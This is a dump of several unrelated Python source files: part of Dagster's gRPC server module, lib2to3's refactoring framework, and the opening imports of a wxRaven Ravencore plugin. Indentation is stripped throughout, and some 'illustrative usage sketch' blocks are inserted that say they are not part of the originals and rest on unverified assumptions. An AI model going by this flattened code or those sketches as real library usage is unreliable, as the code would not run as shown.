# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerFailedToBindEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(namedtuple("GrpcServerLoadErrorEvent", "error_info")):
def __new__(cls, error_info):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(ThreadPoolExecutor(max_workers=max_workers))
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, ipc_output_file, timeout=15):
event = read_unary_response(ipc_output_file, timeout=timeout, ipc_process=server_process)
if isinstance(event, GrpcServerFailedToBindEvent):
raise CouldNotBindGrpcServerToAddress()
elif isinstance(event, GrpcServerLoadErrorEvent):
raise DagsterUserCodeProcessError(
event.error_info.to_string(), user_code_process_error_infos=[event.error_info]
)
elif isinstance(event, GrpcServerStartedEvent):
return True
else:
raise Exception(
"Received unexpected IPC event from gRPC Server: {event}".format(event=event)
)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
with tempfile.TemporaryDirectory() as temp_dir:
output_file = os.path.join(
temp_dir, "grpc-server-startup-{uuid}".format(uuid=uuid.uuid4().hex)
)
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--lazy-load-user-code"] if lazy_load_user_code else [])
+ (["--ipc-output-file", output_file])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (
["--override-system-timezone", mocked_system_timezone]
if mocked_system_timezone
else []
)
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
try:
wait_for_grpc_server(server_process, output_file)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
self.port = None
self.socket = None
self.server_process = None
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.bool_param(lazy_load_user_code, "lazy_load_user_code")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
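# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# A minimal sketch of how GrpcServerProcess is typically driven: spin up a
# subprocess-backed gRPC server for a user code location and obtain an ephemeral
# client for it. The LoadableTargetOrigin keyword argument and "repo.py" are
# assumptions for illustration, not verified against a specific dagster version.
def _example_start_user_code_server():
    origin = LoadableTargetOrigin(python_file="repo.py")  # hypothetical user code file
    server_process = GrpcServerProcess(
        loadable_target_origin=origin,
        max_workers=2,
        heartbeat=False,
    )
    # create_ephemeral_client() (defined above) wraps the subprocess in a client;
    # API calls and shutdown are elided since they depend on the client class.
    client = server_process.create_ephemeral_client()
    return server_process, client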
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import io
import os
import pkgutil
import sys
import logging
import operator
import collections
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fix_names = []
for finder, name, ispkg in pkgutil.iter_modules(pkg.__path__):
if name.startswith("fix_"):
if remove_prefix:
name = name[4:]
fix_names.append(name)
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatterns must either have no type and no content
# or a type and content -- so they don't get any further
# Always return leaves
if pat.type is None:
raise _EveryNode
return {pat.type}
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
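# Illustrative sketch (added for clarity; not part of the original module):
# what _detect_future_features() returns for a small, made-up snippet. Only
# __future__ imports appearing before the first non-docstring statement count.
def _example_detect_future_features():
    src = (
        '"""Module docstring."""\n'
        "from __future__ import print_function, division\n"
        "import os\n"
    )
    # Returns frozenset({'print_function', 'division'}).
    return _detect_future_features(src)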
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"exec_function": False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
explicit: a list of fixers to run even if they are explicit (i.e. normally run only when explicitly requested).
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
self.grammar = pygram.python_grammar.copy()
if self.options['print_function']:
del self.grammar.keywords["print"]
elif self.options['exec_function']:
del self.grammar.keywords["exec"]
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring, but
# only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name)) from None
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping optional fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except OSError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with io.open(filename, "r", encoding=encoding, newline='') as f:
return f.read(), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
# sort by depth; apply fixers from the bottom (of the AST) to the top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
# some fixers (e.g. fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
# previous transformation; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
fp = io.open(filename, "w", encoding=encoding, newline='')
except OSError as err:
self.log_error("Can't create %s: %s", filename, err)
return
with fp:
try:
fp.write(new_text)
except OSError as err:
self.log_error("Can't write %s: %s", filename, err)
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
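# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# A minimal sketch of driving RefactoringTool on an in-memory string, assuming this
# module and its fixers are importable as in the standard library's lib2to3 package
# ("lib2to3.fixes"); the sample source is illustrative.
def _example_refactor_string():
    fixer_names = get_fixers_from_package("lib2to3.fixes")
    tool = RefactoringTool(fixer_names)
    # Parses the (Python 2 style) source, applies every loaded fixer, and returns
    # the refactored parse tree; str(tree) yields the rewritten source.
    tree = tool.refactor_string("print 'hello'\n", "<example>")
    return str(tree)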
|
plugin.py
|
'''
Created on 18 Dec. 2021
@author: slinux
This file contains the main class that defines the plugin.
Each plugin must have a plugin.py file which declares a class wxRavenPlugin(PluginObject).
'''
import webbrowser
# Import the class from the level above; it contains predefined functions to override.
#from plugins.pluginObjectTemplate import *
from wxRavenGUI.application.pluginsframework import *
#import the design of your plugin made in FormBuilder
from .wxRavenRavencoreAssetExplorerLogic import *
#import the logic of your plugin (inherit design class with logic)
from .wxRavenRavencoreDesign import *
#from .wxRavenRavencore_NetworkInfosLogic import *
from .pluginSettings import *
from .wxRavenRavencore_TransactionsViewer_Logic import *
from .wxRavenRavencore_UTXOManagerLogic import *
from .wxRaven_Ravencore_AssetOwnerExporterLogic import *
from .wxRavenRavencore_AddressViewer_Logic import *
# Import the plugin settings panels from another file, to keep things simple.
#from .pluginSettings import MyTutorialSettingPanel_WithLogic
import json
# Used for long-running data requests
import threading
from .wxRavenRavencoreAssetNavigatorLogic import *
from .wxRavenRavencoreAssetIssuerLogic import *
from wxRavenGUI.application.wxcustom import *
from plugins.Ravencore.jobs import *
'''
from plugins.Ravencore.jobs.AddressViewer_AddressUTXOJob import Job_AddressUTXO
from plugins.Ravencore.jobs.AssetNavigator_AssetOwnerJob import Job_AssetNavigator_AssetOwner
from plugins.Ravencore.jobs.AssetNavigator_NavigateAssetJob import Job_AssetNavigator_Explore
from plugins.Ravencore.jobs.AssetSearch_SeachJob import Job_AssetNavigator_Search
from plugins.Ravencore.jobs.TransactionViewer_DecodeJob import Job_DecodeTx
from plugins.Ravencore.jobs.UTXOManager_TransactionHistory import Job_WalletHistory
